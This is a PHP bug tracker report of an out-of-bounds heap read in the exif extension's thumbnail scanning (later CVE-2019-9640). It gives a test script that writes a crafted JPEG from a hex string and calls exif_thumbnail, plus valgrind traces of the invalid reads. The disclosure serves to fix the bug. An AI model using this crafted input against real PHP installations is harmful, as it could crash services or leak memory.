|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2019-01-30 10:49 UTC] cmb@php.net
-Status: Open
+Status: Verified
-PHP Version: 7.3.1
+PHP Version: 7.1Git-2019-01-30 (Git)
[2019-01-30 10:49 UTC] cmb@php.net
[2019-03-02 21:39 UTC] stas@php.net
-Status: Verified
+Status: Assigned
-PHP Version: 7.1Git-2019-01-30 (Git)
+PHP Version: 7.1.26
-Assigned To:
+Assigned To: stas
-CVE-ID:
+CVE-ID: needed
[2019-03-02 21:39 UTC] stas@php.net
[2019-03-04 07:35 UTC] stas@php.net
[2019-03-04 07:35 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2019-03-04 07:35 UTC] stas@php.net
[2019-03-12 08:28 UTC] chamal dot desilva at gmail dot com
[2019-03-12 19:55 UTC] stas@php.net
-CVE-ID: needed
+CVE-ID: 2019-9640
|
|||||||||||||||||||||||||||
Copyright © 2001-2025 The PHP GroupAll rights reserved. |
Last updated: Fri Oct 24 07:00:01 2025 UTC |
Description: ------------ Version ------- PHP 7.3.1 PHP 7.4.0-dev (cli) Description ----------- This bug is present in exif_scan_thumbnail method of ext/exif/exif.c file. These lines in exif_scan_thumbnail method causes this bug. ... case M_SOF15: //exif_process_SOFn method reads 7 bytes from "uchar *data" pointer. // exif_process_SOFn or exif_scan_thumbnail methods don't validate //that "uchar *data" pointer has enough data to read. exif_process_SOFn(data+pos, marker, &sof_info); .... Configure Line --------------- ./configure --prefix=/dir-name/install --enable-cli --enable-exif --enable-debug --without-pear Test script: --------------- <?php $width = 0; $height = 0; $filename = dirname(__FILE__).DIRECTORY_SEPARATOR.'test.jpg'; file_put_contents($filename,hex2bin("ffd8e100554578696600004d4d002a0000000c00000000000000000012000302020001000000010500000001110001000000013d000000010100010000000101000000da00020000ffd8ffcf000000000000000000000000da0002")); $s = exif_thumbnail($filename, $width, $height); echo "Width ".$width."<br>"; echo "Height ".$height; ?> Actual result: -------------- Valgrind Output --------------- Source line numbers are from PHP 7.3.1 export ZEND_DONT_UNLOAD_MODULES=1 export USE_ZEND_ALLOC=0 valgrind ./php/TestCases/test.php ==3659== Invalid read of size 1 ==3659== at 0x24C2E4: exif_process_SOFn (exif.c:2632) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccbe is 0 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361) ==3659== ==3659== Invalid read of size 1 ==3659== at 0x24A45B: php_jpg_get16 (exif.c:1437) ==3659== by 0x24C2FA: exif_process_SOFn (exif.c:2633) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccbf is 1 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361) ==3659== ==3659== Invalid read of size 1 ==3659== at 0x24A46C: php_jpg_get16 (exif.c:1437) ==3659== by 0x24C2FA: exif_process_SOFn (exif.c:2633) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccc0 is 2 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361) ==3659== ==3659== Invalid read of size 1 ==3659== at 0x24A45B: php_jpg_get16 (exif.c:1437) ==3659== by 0x24C311: exif_process_SOFn (exif.c:2634) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccc1 is 3 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361) ==3659== ==3659== Invalid read of size 1 ==3659== at 0x24A46C: php_jpg_get16 (exif.c:1437) ==3659== by 0x24C311: exif_process_SOFn (exif.c:2634) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccc2 is 4 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361) ==3659== ==3659== Invalid read of size 1 ==3659== at 0x24C323: exif_process_SOFn (exif.c:2635) ==3659== by 0x24F135: exif_scan_thumbnail (exif.c:3923) ==3659== by 0x2521B3: zif_exif_thumbnail (exif.c:4654) ==3659== by 0x52EA5B: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:690) ==3659== by 0x59146D: execute_ex (zend_vm_execute.h:55418) ==3659== by 0x59608D: zend_execute (zend_vm_execute.h:60834) ==3659== by 0x4D2103: zend_execute_scripts (zend.c:1568) ==3659== by 0x44904D: php_execute_script (main.c:2630) ==3659== by 0x598C98: do_cli (php_cli.c:997) ==3659== by 0x599E3F: main (php_cli.c:1389) ==3659== Address 0x4d6ccc3 is 5 bytes after a block of size 6 alloc'd ==3659== at 0x483021B: malloc (in /usr/lib/valgrind/vgpreload_memcheck-x86-linux.so) ==3659== by 0x4A0495: __zend_malloc (zend_alloc.c:2904) ==3659== by 0x49F82D: _emalloc (zend_alloc.c:2494) ==3659== by 0x49FD14: _estrndup (zend_alloc.c:2605) ==3659== by 0x24CBB0: exif_thumbnail_extract (exif.c:2929) ==3659== by 0x24E7D1: exif_process_IFD_in_JPEG (exif.c:3598) ==3659== by 0x24E942: exif_process_TIFF_in_JPEG (exif.c:3644) ==3659== by 0x24EA03: exif_process_APP1 (exif.c:3669) ==3659== by 0x24EECE: exif_scan_JPEG_header (exif.c:3814) ==3659== by 0x24FDF5: exif_scan_FILE_header (exif.c:4203) ==3659== by 0x250664: exif_read_from_impl (exif.c:4344) ==3659== by 0x2506CF: exif_read_from_stream (exif.c:4361)